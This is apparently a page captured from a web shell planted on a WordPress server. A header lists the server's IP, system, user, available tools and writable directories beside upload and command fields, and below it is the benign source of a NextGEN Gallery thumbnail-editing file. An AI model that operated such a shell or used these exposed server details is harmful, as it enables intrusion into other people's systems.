403Webshell
Server IP : 15.235.198.142  /  Your IP : 216.73.216.190
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ballsack 6.8.0-45-generic #45-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 30 12:02:04 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/rhodeworks/wp-content/plugins/nextgen-gallery/src/Legacy/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/rhodeworks/wp-content/plugins/nextgen-gallery/src/Legacy/admin/edit-thumbnail.php
<?php

/**

Custom thumbnail for NGG
Author : Simone Fumagalli | simone@iliveinperego.com
More info and update : http://www.iliveinperego.com/custom_thumbnail_for_ngg/

Credits:
NextGen Gallery : Alex Rabe | http://alexrabe.boelinger.com/wordpress-plugins/nextgen-gallery/
jCrop : Kelly Hallman <khallman@wrack.org> | http://deepliquid.com/content/Jcrop.html
 **/

require_once dirname( __DIR__ ) . '/ngg-config.php';
require_once NGGALLERY_ABSPATH . '/lib/image.php';

if ( ! is_user_logged_in() ) {
	die( esc_html__( 'Cheatin&#8217; uh?', 'nggallery' ) );
}

if ( ! current_user_can( 'NextGEN Manage gallery' ) ) {
	die( esc_html__( 'Cheatin&#8217; uh?', 'nggallery' ) );
}

if ( ! isset( $_GET['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_GET['nonce'] ) ), 'ngg_edit_thumbnail' ) ) {
	die( esc_html__( 'Permission denied', 'nggallery' ) );
}

if ( ! isset( $_GET['id'] ) ) {
	die( esc_html__( 'Permission denied', 'nggallery' ) );
}

global $wpdb;

$id = (int) $_GET['id'];

// let's get the image data.
$picture = nggdb::find_image( $id );

require_once nggGallery::graphic_library();
$ngg_options = get_option( 'ngg_options' );

$thumb = new ngg_Thumbnail( $picture->imagePath, true );
$thumb->resize( 450, 350 );
// we need the new dimension.
$resizedPreviewInfo = $thumb->newDimensions;
$thumb->destruct();

// Generate a url to a preview image.
$storage           = \Imagely\NGG\DataStorage\Manager::get_instance();
$thumbnail_manager = \Imagely\NGG\DynamicThumbnails\Manager::get_instance();
$dynamic_size      = $thumbnail_manager->get_size_name(
	[
		'width'  => 450,
		'height' => 350,
	]
);
$preview_image     = $storage->get_image_url( $id, $dynamic_size );


$imageInfo = @getimagesize( $picture->imagePath );
$rr        = round( $imageInfo[0] / $resizedPreviewInfo['newWidth'], 2 );

if ( ( $ngg_options['thumbfix'] == 1 ) ) {

	$WidthHtmlPrev  = $ngg_options['thumbwidth'];
	$HeightHtmlPrev = $ngg_options['thumbheight'];

} else {
	// H > W.
	if ( $imageInfo[1] > $imageInfo[0] ) {
		$HeightHtmlPrev = $ngg_options['thumbheight'];
		$WidthHtmlPrev  = round( $imageInfo[0] / ( $imageInfo[1] / $ngg_options['thumbheight'] ), 0 );
	} else {
		$WidthHtmlPrev  = $ngg_options['thumbwidth'];
		$HeightHtmlPrev = round( $imageInfo[1] / ( $imageInfo[0] / $ngg_options['thumbwidth'] ), 0 );
	}
}

$thumbnail_crop_frame      = isset( $picture->meta_data['thumbnail']['crop_frame'] ) ? $picture->meta_data['thumbnail']['crop_frame'] : null;
$default_crop_js_parameter = null;

if ( $thumbnail_crop_frame != null ) {
	$crop_x      = round( ( (float) $thumbnail_crop_frame['x'] ) / $rr );
	$crop_y      = round( ( (float) $thumbnail_crop_frame['y'] ) / $rr );
	$crop_width  = round( ( (float) $thumbnail_crop_frame['width'] ) / $rr );
	$crop_height = round( ( (float) $thumbnail_crop_frame['height'] ) / $rr );
	$crop_x2     = $crop_x + $crop_width;
	$crop_y2     = $crop_y + $crop_height;

	$default_crop_js_parameter = 'setSelect: [' . $crop_x . ',' . $crop_y . ',' . $crop_x2 . ',' . $crop_y2 . '],';
}

?>
<script src="<?php echo NGGALLERY_URLPATH; ?>/admin/js/Jcrop/js/jquery.Jcrop.js"></script>
<link rel="stylesheet" href="<?php echo NGGALLERY_URLPATH; ?>/admin/js/Jcrop/css/jquery.Jcrop.css" type="text/css" />

<script type="text/javascript">
	var status = 'edit';
	var xT, yT, wT, hT, selectedCoords;
	var selectedImage = "thumb<?php echo $id; ?>";

	function showPreview(coords) {
		if (status != 'edit') {
			jQuery('#actualThumb').hide();
			jQuery('#previewNewThumb').hide();
			status = 'edit';
		}

		var rx = <?php echo $WidthHtmlPrev; ?> / coords.w;
		var ry = <?php echo $HeightHtmlPrev; ?> / coords.h;

		jQuery('#imageToEditPreview').css({
			width: Math.round(rx * <?php echo $resizedPreviewInfo['newWidth']; ?>) + 'px',
			height: Math.round(ry * <?php echo $resizedPreviewInfo['newHeight']; ?>) + 'px',
			marginLeft: '-' + Math.round(rx * coords.x) + 'px',
			marginTop: '-' + Math.round(ry * coords.y) + 'px'
		});

		xT = coords.x;
		yT = coords.y;
		wT = coords.w;
		hT = coords.h;

		jQuery("#sizeThumb").html(xT+" "+yT+" "+wT+" "+hT);
	};

	function updateThumb(nonce) {
		if ( (wT == 0) || (hT == 0) || (wT == undefined) || (hT == undefined) ) {
			alert("<?php esc_html_e( 'Select with the mouse the area for the new thumbnail', 'nggallery' ); ?>");
			return false;
		}

		jQuery.ajax({
			url: ajaxurl,
			type : "POST",
			data:  {
				x: xT,
				y: yT,
				w: wT,
				h: hT,
				action: 'createNewThumb',
				id: <?php echo $id; ?>, rr: <?php echo str_replace( ',', '.', $rr ); ?>,
				nonce: nonce
			},
			cache: false,
			success: function(data){
				var d = new Date();
				newUrl = jQuery("#"+selectedImage).attr("src") + "?" + d.getTime();
				jQuery("#"+selectedImage).attr("src" , newUrl);

				jQuery('#thumbMsg').html("<?php esc_html_e( 'Thumbnail updated', 'nggallery' ); ?>");
				jQuery('#thumbMsg').css({'display':'block'});
				setTimeout(function(){ jQuery('#thumbMsg').html(''); }, 1500);
			},
			error: function() {
				jQuery('#thumbMsg').html("<?php esc_html_e( 'Error updating thumbnail', 'nggallery' ); ?>");
				jQuery('#thumbMsg').css({'display':'block'});
				setTimeout(function(){ jQuery('#thumbMsg').fadeOut('slow'); }, 1500);
			}
		});
	}
</script>

<table align="center">
	<tr>
		<td rowspan="3" valign="middle" align="center" id="ngg-overlay-dialog-main">
			<small><?php esc_html_e( 'Select the area for the thumbnail from the picture below.', 'nggallery' ); ?></small>
			<img src="<?php echo \Imagely\NGG\Util\Router::esc_url( $preview_image ); ?>" alt="" id="imageToEdit" />
		</td>
		<td style="display:none;">
			<small><?php esc_html_e( 'Select the area for the thumbnail from the picture on the left.', 'nggallery' ); ?></small>
		</td>
	</tr>
	<tr style="display:none;">
		<td align="center">
			<div id="previewNewThumb" style="display:none;width:<?php echo $WidthHtmlPrev; ?>px;height:<?php echo $HeightHtmlPrev; ?>px;overflow:hidden; margin-left:5px;">
				<img src="<?php echo \Imagely\NGG\Util\Router::esc_url( $preview_image ); ?>" id="imageToEditPreview" />
			</div>
			<div id="actualThumb">
				<img src="<?php echo \Imagely\NGG\Util\Router::esc_url( $picture->thumbURL ); ?>?<?php echo time(); ?>" />
			</div>
		</td>
	</tr>
</table>
<div id="ngg-overlay-dialog-bottom">
	<div id="thumbMsg"></div>
	<?php $update_thumb_nonce = wp_create_nonce( 'ngg_update_thumbnail' ); ?>
	<input type="button" name="update" value="<?php esc_attr_e( 'Update', 'nggallery' ); ?>" onclick="updateThumb('<?php print esc_attr( $update_thumb_nonce ); ?>')" class="button-secondary" />
</div>

<script type="text/javascript">
	(function($) {
		$(function() {
			jQuery('#imageToEdit').Jcrop({
				onChange: showPreview,
				onSelect: showPreview,
				<?php echo $default_crop_js_parameter; ?>
				aspectRatio: <?php echo str_replace( ',', '.', round( $WidthHtmlPrev / $HeightHtmlPrev, 3 ) ); ?>
			});
		});
	})(jQuery);
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit